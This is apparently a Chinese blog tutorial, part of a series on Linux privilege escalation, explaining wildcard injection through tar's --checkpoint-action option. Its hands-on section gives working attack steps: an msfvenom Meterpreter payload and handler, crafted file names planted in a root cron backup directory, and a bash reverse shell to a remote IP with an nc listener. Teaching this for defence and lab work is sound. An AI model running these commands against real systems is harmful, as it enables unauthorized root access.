当前位置: 首页 > news >正文

操作系统权限提升(二十三)之Linux提权-通配符(ws)提权

系列文章

操作系统权限提升(十八)之Linux提权-内核提权
操作系统权限提升(十九)之Linux提权-SUID提权
操作系统权限提升(二十)之Linux提权-计划任务提权
操作系统权限提升(二十一)之Linux提权-环境变量劫持提权
操作系统权限提升(二十二)之Linux提权-SUDO滥用提权

利用通配符(WS)进行提权

利用通配符(WS)进行提权原理

接下来介绍一个非常有趣而又古老的技术通配符注入提权

首先先看下什么是通配符

在LINUX中通配符可以被用来模糊匹配,而且通配符的输入是由当前用户的shell去进行解析

* 代表任意数量的字符? 字符代表单个字符[] 匹配中括号中的任意单一字符 可以使用连字符-表示范围,比如[0-9]

我们在当前的目录创建几个文本,1.txt,2.txt,3.txt

在这里插入图片描述
接下来使用通配符去查看文件 ls ?.txt 可以查到 一个字符后面加.txt的文件

在这里插入图片描述

我们在当前目录在创建几个文件,a.txt,ab.txt,abc.txt

在这里插入图片描述

然后使用?进行匹配,可以看到?可以匹配单个字符

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用*进行匹配,代表任意的多个字符

在这里插入图片描述

使用ls [0-9].txt,匹配0-9数字的txt

在这里插入图片描述
[...] 匹配方括号之中的任意一个字符

在这里插入图片描述

接下来看一下什么是Wildcard wildness简称WS

我们先创建3个文件

echo "1" > file1
echo "2" >file2
echo "3" > --help

在这里插入图片描述

接下来查看文件里面的内容,发现文件1和文件2都可以查看,但是–help查看不了,直接调出了–help的命令,这种类型的技巧称为Wildcard wildness。

在这里插入图片描述

这时如果我们执行 ls * 那么就会执行 ls --help

在这里插入图片描述

如何利用这一点进行提权呢?大家和思考一下

如果有的命令的参数中可以去执行linux命令,我们进行劫持,达到提权的目的,我们以tar命令为例子

tar命令是Linux中的压缩命令,可以对文件进行压缩

tar -czf html.tgz 1.html #将文件1.html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

也可以使用通配符进行压缩

tar -czf html.tgz *.html #将文件所有html文件压缩成html.tgz

在这里插入图片描述
在这里插入图片描述

在tar中有执行linux命令的参数如下

tar -czf 1.tgz 1.html --checkpoint=1 --checkpoint-action=exec=whoami

在这里插入图片描述

可以对后面的命令进行劫持 ,只需要要编写一个这样的参数文件就行可以了

echo " " > --checkpoint=1
echo " " > --checkpoint-action=exec=whoami

在这里插入图片描述

接着运行 tar -czf html.tgz *

在这里插入图片描述

提权准备

一般都有备份网站的习惯,那么运维人员或管理员填写了备份文件的计划任务任务,如果滥用了通配符,就可能导致提权

*/1 * * * * root tar -cvf /var/html.tgz /var/www/html/ *

在这里插入图片描述

提权实战

首先上线MSF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.41.211 LPORT=8888 -f elf > mshell.elfuse exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.41.211
set lport 8888
run

在这里插入图片描述

查看计划任务,发现有滥用通配符的,并且是root权限,可以进行提权

cat /etc/crontab

在这里插入图片描述

在/var/www/html下创建两个文件如下

echo " " > /var/www/html/--checkpoint=1
echo " " > /var/www/html/--checkpoint-action=exec='bash shell.sh'
echo "bash -i >& /dev/tcp/192.168.41.211/8888 0>&1" >> /var/www/html/shell.sh

在这里插入图片描述

使用NC进行监听,等待sh脚本被执行,连接NC

nc -lvvp 8888

在这里插入图片描述

http://www.lryc.cn/news/25158.html

相关文章:

  • Zookeeper下载和安装
  • Biomod2 (上):物种分布模型预备知识总结
  • 操作指南:如何高效使用Facebook Messenger销售(二)
  • 计算机三级|网络技术|中小型网络系统总体规划与设计方案|IP地址规划技术|2|3
  • 为什么一定要做集成测试?
  • 前端:CSS
  • CMMI—组织级过程定义(OPD)
  • 华为OD机试真题Python实现【猜字谜】真题+解题思路+代码(20222023)
  • 软测入门(三)Selenium(Web自动化测试基础)
  • 备战蓝桥杯——sort函数
  • 华为机试题:HJ86 求最大连续bit数(python)
  • 机器学习复习--logistic回归简单的介绍和代码调用
  • uniapp小程序接入腾讯地图sdk
  • 总结JavaScript中的条件判断与比较运算
  • 算法练习-排序(一)
  • CentOS7.6快速安装Docker
  • CentOS 7安装N卡驱动和CUDA和cuDNN
  • Java开发 - 分页查询初体验
  • C语言循环语句do while和嵌套循环语句讲解
  • 【计算机视觉】OpenCV 4高级编程与项目实战(Python版)【7】:拼接图像
  • 王道操作系统课代表 - 考研计算机 第二章 进程与线程 究极精华总结笔记
  • C++修炼之练气期三层——函数重载
  • 在linux上运行jar程序操作记录
  • 【STM32】入门(十二):实时操作系统RTOS和通用操作系统GPOS的区别
  • 2023-3-1刷题情况
  • Web前端学习:五 - 练习
  • 软件测试之测试用例设计方法—等价类划分法
  • gdb常用命令详解
  • 2022 年江西省职业院校技能大赛高职组“信息安全管理与评估”赛项样题
  • 射频调试的习惯